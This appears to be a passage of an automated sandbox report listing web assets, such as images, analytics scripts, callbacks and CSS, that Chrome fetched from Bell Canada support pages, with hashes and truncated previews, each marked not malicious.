                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.......P.....'I.|....gAMA......a....8eXIfMM.*.......i......................................P.......g...VIDATx....fS....Mb.I...L...E%*..6..(.u.2D.B....."{.G.l-.i.."3-.d............;.f...y.{.g...9.y.3-t..(&N=......~3...G.V.o..&..1.1....M+.....M:_..b]/........x.+_..k.U7.).7..........y..g...u.....u.].n..........1.1..."....VZ)....~.._YR.|..NZf.e..!_V.HNj...O.TD.P..7.tS.....~._....,.n&....2c...X~....k.....'..7.8....A.|.~.....!.63..O<....P.&.:. b...rKZ._g.d.....n.ax....f..!...x[........M..."/\.0\r.%>o>.....2....]w.5...|.c.......f.@..._..fb......3m.}......V>f.d.........0g...>t..s./...[w....SNY^.#o....................c.A.G.........5.nl]..,....V.<.+.....c.@...`.e.'?......f......i3..!c c`<1...&..G?.s.t.I.p2!.yC.g.*...I.1.10..8..s.g..dB..&....!c c`.1....6.z..0.-..\a..!c c`.1....0k.6.3.r]{mW...~........F/{.i..<!...n..l.|.y..1.....Vt.:,.L..2d.d..;0`...wu..+.................]..z:...K..dv.=[F.T...j.={v...(.o..*.......Z......i..BO
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 564 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):16081
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.942632407356857
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:8n/nJAk8kBcQ+PN/pKEHpLw7Fwfo03gs0VXoOGbzB:8Pki+PN/pKgNw74V3r0dKbzB
                                                                                                                                                                                                                                                                                                                                      MD5:8EB9CF21FE8441FD54725BFE7AB2BBBB
                                                                                                                                                                                                                                                                                                                                      SHA1:EA286946D0004FE420FE6DEB26FB1B82A2C37E97
                                                                                                                                                                                                                                                                                                                                      SHA-256:5CB317B709E96F1D136B343FFE81C430573EF56C94B6BA14684969C1C756AD9F
                                                                                                                                                                                                                                                                                                                                      SHA-512:03CD35DA4D35DB4D774CA94857311FEF8257D5EB89A43D34DF1D3CA4303774A9A3E91A4F97E26476C7AF948B22C7E9627E9E2BF57C97932AE3C9787BDB6A9075
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/_web/images/support/Google_play.png
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...4...........t.....pHYs...#...#.x.?v....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Macintosh)" xmp:CreateDate="2021-03-12T10:29:54-05:00" xmp:ModifyDate="2021-03-12T14:15:51-05:00" xmp:MetadataDate="2021-03-12T14:15:51-05:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:495b953a-556c-4a39-bb77-461e7175276a" xmpMM:DocumentID="xmp.did:495b953a-556c-4a39-bb77-461e7175276a" xmpMM:Origin
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32766)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):33462
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.357057188294372
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:oLXw5OhrPiX7fVXt9KQ2vYlcOe9kBEemysr0:oLXw5OhraX7f58Yxq/0
                                                                                                                                                                                                                                                                                                                                      MD5:F259EE6445C19C2CE3C64A1B117A4F35
                                                                                                                                                                                                                                                                                                                                      SHA1:A4C64554F653AB4E5BD5D2D03CE5685BB0A9DDB8
                                                                                                                                                                                                                                                                                                                                      SHA-256:D6B423C91328EEC9C218DD8B21AE1E676987D574E5432411A32806E5DD2BDE32
                                                                                                                                                                                                                                                                                                                                      SHA-512:8050C59A188BF36A920EE6BD90BA52F14967AD2085A32A37D9211C265803C962276146F8FD5F8487D42763CE9A68D3DC6CCD053322B57DE52FAF3A03962DBB99
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement.js`..function AppMeasurement(f){var g=this;g.version="2.22.0";var p=window;p.s_c_in||(p.s_c_il=[],p.s_c_in=0),g._il=p.s_c_il,g._in=p.s_c_in,g._il[g._in]=g,p.s_c_in++,g._c="s_c";var d=p.AppMeasurement.ic;d||(d=null);var l,b,k,m=p;try{for(l=m.parent,b=m.location;l&&l.location&&b&&""+l.location!=""+b&&m.location&&""+l.location!=""+m.location&&l.location.host===b.host;)l=(m=l).parent}catch(e){}g.C=function(e){try{console.log(e)}catch(t){}},g.Ra=function(e){return""+parseInt(e)==""+e},g.replace=function(e,t,a){return!e||e.indexOf(t)<0?e:e.split(t).join(a)},g.escape=function(e){var t,a;if(!e)return e;for(e=encodeURIComponent(e),t=0;t<7;t++)a="+~!*()'".substring(t,t+1),0<=e.indexOf(a)&&(e=g.replace(e,a,"%"+a.charCodeAt(0).toString(16).toUpperCase()));return e},g.unescape=function(e){if(!e)return e;e=0<=e.indexOf("+")?g.replace(e,"+"," "):e;try{return decodeURIComponent(e)}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32758)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):567139
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.442340315284627
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:bz37tOOHt4gLSbNVp5PdtAGdyEVZXZIoEL5ANaMLFxHuuBlxx0MugDsZQLrmPATR:bd6HZXZwVANaMiuBPnu/Z+iE
                                                                                                                                                                                                                                                                                                                                      MD5:C17DADF24CB0DE7E3D1611FEB02CD426
                                                                                                                                                                                                                                                                                                                                      SHA1:5560C68B6657EE715F1C62481F7C5E800F073A37
                                                                                                                                                                                                                                                                                                                                      SHA-256:4D990F5FBF7107295DB51EECA8BD5FC8237D7F7A3E6F04C2371FE8606B618E71
                                                                                                                                                                                                                                                                                                                                      SHA-512:BE84434FA3569BEA68FB0B7E3E1BEFEB5E6FF5B30C7BE3505115AC6CD83BD7680A3C437BA067D8E47F9E6FDF67C7A72476378E98A1AF96759F7D002900AEB0E9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/launch-ENebd7a9b148404f67903d514c40949f24.js`..(function(){window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-10-29T16:55:46Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENebd7a9b148404f67903d514c40949f24",stage:"production"},dataElements:{t_sc_event0010:{defaultValue:"",storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=_satellite.getVar("d_action_state")||"";return"179-2-1"==e||"179-0-0"==e}}},"meta-mobility-device-type":{defaultValue:"not set",forceLowerCase:!0,storageDuration:"session",modulePath:"core/src/lib/dataElements/domAttribute.js",settings:{elementProperty:"content",elementSelector:"meta[name='MobDeviceType']"}},ga_dim51:{defaultValue:"",storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return _satel
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.956142338264213
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREy4MyqXXl6Ed61CSHI:UrXiZaqX1VCRo
                                                                                                                                                                                                                                                                                                                                      MD5:E2FAD4C69591F33C92D43C2148154B88
                                                                                                                                                                                                                                                                                                                                      SHA1:285DDE6E134D03872BAE9554B7C0B6775359CE3A
                                                                                                                                                                                                                                                                                                                                      SHA-256:5D00EB45C50FDE3F25B69488DDE1BC08E93E5B697FB81EEC42DAD1535EEBA1FD
                                                                                                                                                                                                                                                                                                                                      SHA-512:472F773E7A3A334F07D385A04804ACDE16905EFF555ABB54783220E6359CDAB5E767F5090007E6C92883F1515E260D15C12A8D88414F6E4AA2C394D85B0F7F45
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__4
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__4 === 'function' && branch_callback__4("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6658
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.707264480149804
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:O/Nguk4ZivAkYZ5UkYIQvIqq+ZPwk5cyUs:Ol9J98/N
                                                                                                                                                                                                                                                                                                                                      MD5:E9435F2410BCC234F248B722CB061BBD
                                                                                                                                                                                                                                                                                                                                      SHA1:D473786B2F29A86DE01C0267C3985247C2D3A371
                                                                                                                                                                                                                                                                                                                                      SHA-256:2D0ED1CB6B9C042A7C207C6A50EC8740AF6F9B1AC0E0A5D0DDA026C05B2034D5
                                                                                                                                                                                                                                                                                                                                      SHA-512:6A946A70C5999C86FBBDC934E61B1FD58A9CE567C7EAAD159AF039F997F8B33829EA21611CCFC023774CE164D58D11F468E0BA9CAAAA265F3A00D65C6E159954
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/mybell/js/registrationFlow-login.js?ver=202211061705
                                                                                                                                                                                                                                                                                                                                      Preview:../* Required for Show/Hide Password Button widget..---------------------------------------------- */..//Modified as per change request form Business..function maskUnmaskPws(obj) {...var txtShow = jQuery('#showText').val();.. var txtHide = jQuery('#hideText').val();.. var showHideButton = $('.maskUnMaskPwsBtn');.. var showLabel = jQuery('#showLabel').val(), hideLabel = jQuery('#hideLabel').val();...if (obj.prev('input').attr('type') == 'password') {....obj.parents(".row").find(".maskUnMaskPwsBtn").html(txtHide);....obj.parents(".row").find(".maskUnMaskPwsTxtBox").attr('type', 'text'); ....var SearchInput = obj.prev("input");....var strLength = SearchInput.val().length * 2;....obj.prev("input").focus();.. SearchInput[0].setSelectionRange(strLength, strLength);.. showHideButton.attr('aria-label', hideLabel);...}...else {....obj.parents(".row").find(".maskUnMaskPwsBtn").html(txtShow);....obj.parents(".row").find(".maskUnMaskPwsTxtBox").attr('type', 'password');....v
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1614)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1761
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4157915092337285
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zl1ect/BMl1GvxLE54Bh33hs4IqKDnRFN59acFdWFVNIsUKxlQgggqDmqI2tbQRK:zljt/BMlsJY5vDf9hdcxxqiqDpAe57pv
                                                                                                                                                                                                                                                                                                                                      MD5:2C5B10008FFD78B559E9EDAD15D79BC0
                                                                                                                                                                                                                                                                                                                                      SHA1:9D477A2B5C1E5AE1CF44B5F7322059ADFB6D9505
                                                                                                                                                                                                                                                                                                                                      SHA-256:70845DF3667BE0DBF606B8D35ADEFECD7B1DD1D623B60878974A21A99D5EC5FC
                                                                                                                                                                                                                                                                                                                                      SHA-512:B29C1F19BB607766AB38F79E89554DF18C4218F27FCBC0E16CA68A8657B41BBCB6F85A901E2B61AEB830978E20068015CF86BFBDA629D1E5254AE31A395F885B
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa747122d14e1446181b879b9f444e263-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa747122d14e1446181b879b9f444e263-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa747122d14e1446181b879b9f444e263-source.min.js', "try{var brsPathList=[\"/Bell-bundles\",\"/Forfaits-Bell\",\"/Bell_Internet\",\"/Services_Internet\",\"/Bell_TV\",\"/Bell_Tele\",\"/Fibe-TV\",\"/Tele-Fibe\",\"/Appli-Tele-Fibe\",\"/Home_phone\",\"/Telephonie\",\"/Smart-Home\",\"/Maison-intelligente\",\"/search\",\"/recherche\",\"/Bell-Promotions/Promo-Code\",\"/Offres-de-Bell/Code-promotionnel\"],mobPathList=[\"/Mobility/Our_network$\",\"/Mobilite/Le_reseau$\",\"/Mobility/Trade-in-program$\",\"/Mobilite/Programme-d-echange-Bell$\",\"/Mobility/Cell_phone_plans/Unlimited-plans$\",\"/Mobilite/Forfaits/Forfaits-illimites$\",\"/Mobility/Smartphones_and_mobile_internet_devices$\",\"/Mobilite/Telephones_cellulaires_intelligent_et_Internet_mobile$\",\"/Mo
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):322753
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.021061369447894
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:u3xfJWvdFXxI/4YNNs8LdQMueMoKG5xSpnqdOReldsJ4iEW81SMIOlziV53tNjkG:+9Ldj5MsVdaBOiEW9MblAdjt
                                                                                                                                                                                                                                                                                                                                      MD5:6514121A0BAC89393DD58842B16ECFFF
                                                                                                                                                                                                                                                                                                                                      SHA1:0D2AF494456982D7EB7416E86323F893BD385FB7
                                                                                                                                                                                                                                                                                                                                      SHA-256:B1204CDEB3D94777DE86B0B9CDBE447023C448E17FE59CD92F006F4F4C79ECB4
                                                                                                                                                                                                                                                                                                                                      SHA-512:39340FADA09AA1C7931C0D1DDB401687F3585CD2961440727B3E19F64593A4108AB9F18AAEA0349E858856BA58A61CE424EF747268BF39B89542C8610FB02692
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca/static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q
                                                                                                                                                                                                                                                                                                                                      Preview:(function C(fb,fd,g,h){var fE=ReferenceError,fi=TypeError,fn=Object,fJ=RegExp,fr=Number,fK=String,fN=Array,fk=fn.bind,fG=fn.call,ft=fG.bind(fk,fG),O=fn.apply,fU=ft(O),s=[].push,P=[].pop,j=[].slice,M=[].splice,m=[].join,R=[].map,v=ft(s),N=ft(j),Z=ft(m),q=ft(R),U={}.hasOwnProperty,fC=ft(U),r=JSON.stringify,fo=fn.getOwnPropertyDescriptor,fI=fn.defineProperty,fF=fK.fromCharCode,w=typeof URL==="function"?URL.createObjectURL:null,fz=typeof Blob==="function"?Blob:null,fp=typeof Worker==="function"?Worker:null,Y=Math.min,fc=Math.floor,fa=fn.create,e="".indexOf,B="".charAt,ff=ft(e),fL=ft(B),fH=typeof Uint8Array==="function"?Uint8Array:fN;var fT=[fE,fi,fn,fJ,fr,fK,fN,fk,fG,O,s,P,j,M,m,R,U,r,fo,fI,fF,Y,fc,fa,e,B,fH];var n=["-9bATEvsF2EA4LNtzmYEE_a-OTMaX8GUrJk77R_IQ7YqXCqODwx2SlXnoEsQdoPUZnFQOWhJU9DCGp32jO6Y2vduAcWkQ2UpNyHnwD0G9dAUdU79ecpYlRG3pMo","XjpSpMgz4IC-eHbiHLTC-mEcodmcplcPbWDXNtU99C2IuskTsJCFhpQTUb8","BjI","W34c3rInsP0","QgY","all","lastIndexOf","SeCBCwStIiEP66VemF4LMZrAeGkf","E8ONQge1","8
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREFYo1yqXXl6ECUP1CSHI:UrXimPwqX1/tRo
                                                                                                                                                                                                                                                                                                                                      MD5:58F945C9D418F06F89DAC38E33C9CB3F
                                                                                                                                                                                                                                                                                                                                      SHA1:86FB4BD2D9DF351F2F973395210795C2BCBFA2DD
                                                                                                                                                                                                                                                                                                                                      SHA-256:951B8330552312B27356D86FD8EDA74E67700F16E9D8BD754D08A2484564A1B9
                                                                                                                                                                                                                                                                                                                                      SHA-512:0B189A69DF18396A01D34D47CB8D7FB8D827C79C58664EAA11A56ACEA56813A45F074FB8FE133861959D71A378C71F1BB46B34D393251C6FA149B2DF6BD74CAD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__1 === 'function' && branch_callback__1("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4093
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.687583032984856
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:12oZc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOoa:12oZc5WNXK3XuXW5e
                                                                                                                                                                                                                                                                                                                                      MD5:CBBEBADB81364710EEDE4347330CDDB5
                                                                                                                                                                                                                                                                                                                                      SHA1:7295A459603600AB71E51D44A1121C3A4828D5C3
                                                                                                                                                                                                                                                                                                                                      SHA-256:9E391D1E062E437D6F55E60BA5BAE17010A3A0362517E4FD99BBEB214274A009
                                                                                                                                                                                                                                                                                                                                      SHA-512:0E12501FC0AB6FDB414F866EFC67911389296D7E27214943303F7D0F6515BD70401DB58F47949ADCEE646E3C6F5D59F85C8E6B72CCAF292A4002D0AFD2A69B6F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- < 1) retu
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREpEyqXXl6EAeQ1CSHI:UrXiglqX17MRo
                                                                                                                                                                                                                                                                                                                                      MD5:ABEC128E96803A20D55C93E54FAD5458
                                                                                                                                                                                                                                                                                                                                      SHA1:E60C513C210F84533668558E6343B4BAC948E878
                                                                                                                                                                                                                                                                                                                                      SHA-256:910D0405D12EF4DD1354343212C91BE169D0769E2163EECD9A877C00AFA3E795
                                                                                                                                                                                                                                                                                                                                      SHA-512:284E2DC7C6A5D25020791EC4B7193715F442B3C6250156C063ED0FE79E57094FC79DD14568E227FB282961B9CF25D6466851A8CD65F66EC3B28E77237FCAB94A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__0 === 'function' && branch_callback__0("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6765), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6765
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.118585366164317
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:2hEy9aIzn+Sv4ZjjZ/fcfIfRN4Y226Md54/3eSLfbov1M:2Wn3tfmsM
                                                                                                                                                                                                                                                                                                                                      MD5:5AB7C23958D0D7CE763A5B5CD4C014A9
                                                                                                                                                                                                                                                                                                                                      SHA1:4A318C3F26D5CB7478F1DFFC4F353AA67D259266
                                                                                                                                                                                                                                                                                                                                      SHA-256:F124A2E09CAB4FBAF28387E6CCAC863581FC8A42652D349B50CE37CB6C79DD01
                                                                                                                                                                                                                                                                                                                                      SHA-512:BD2A3E2B4DE8127FFA2DFD3C213D06C33379B469D4BE41F60AE2F7F8628445DA1BAD415BF543BF7190895634E93A4516BF724A54E74F951FE8AC79F307C1E933
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/support_billing.css?v=CgLVTnDsNrFpsHySog5ofGmx0e1EFCnTJXxgu0X7wDQ1
                                                                                                                                                                                                                                                                                                                                      Preview:.width-70{width:70px}.width-95{width:95px}.width-290{width:290px}.min-height-570{min-height:570px}.max-h-100p{max-height:100%}.max-height-inherit{max-height:inherit}.height-440{height:440px}.dimension-80{height:80px;width:80px}.right-20{right:20px}.z-index-2{z-index:2}.txtSize80{font-size:80px}.line-height-25{line-height:25px}.forward-space::after{content:' '}@media(min-width:768px){.width-unset-sm{width:unset}.width-320-sm{width:320px}.min-width-950-sm{min-width:950px}.height-60-sm{height:60px}.height-305-sm{height:305px}.min-height-540-sm{min-height:540px}.txtSize54-sm{font-size:54px}.txtSize60-sm{font-size:60px}.dimension-90-sm{height:90px;width:90px}.dimension-100-sm{height:100px;width:100px}.column-spacer-15-sm{margin-left:-7.5px;margin-right:-7.5px}.column-spacer-15-sm>div{padding-left:7.5px;padding-right:7.5px}.position-absolute-sm{position:absolute}.position-center-sm{left:50%;top:50%;transform:translate(-50%,-50%)}.flex-unset-sm{flex:unset}.subtitle-2-reg-sm{font-size:18px;fon
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):78685
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.020288496082252
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:OfGNbFoZJSUYOOaLnAW8+IcTOIobkhXwW5vxM:mGRFauOxLA/+IcTOuXK
                                                                                                                                                                                                                                                                                                                                      MD5:47BEA70318B724B1A99A1D571FF58807
                                                                                                                                                                                                                                                                                                                                      SHA1:B66FFE704AD2FE84DA8211D6351727568FD68B78
                                                                                                                                                                                                                                                                                                                                      SHA-256:11A188A204934185AB5649A1F838FE771C3D84C928BC8286EF999FB5B8DEDA69
                                                                                                                                                                                                                                                                                                                                      SHA-512:7995460AB00A68E3433EA72F19FCB1BCD8485BF4CAF978FF5C47193F110899AA824AC4A697285E908A5F66C693604A0227E60B3D3D948115C4C3490022B82E3D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
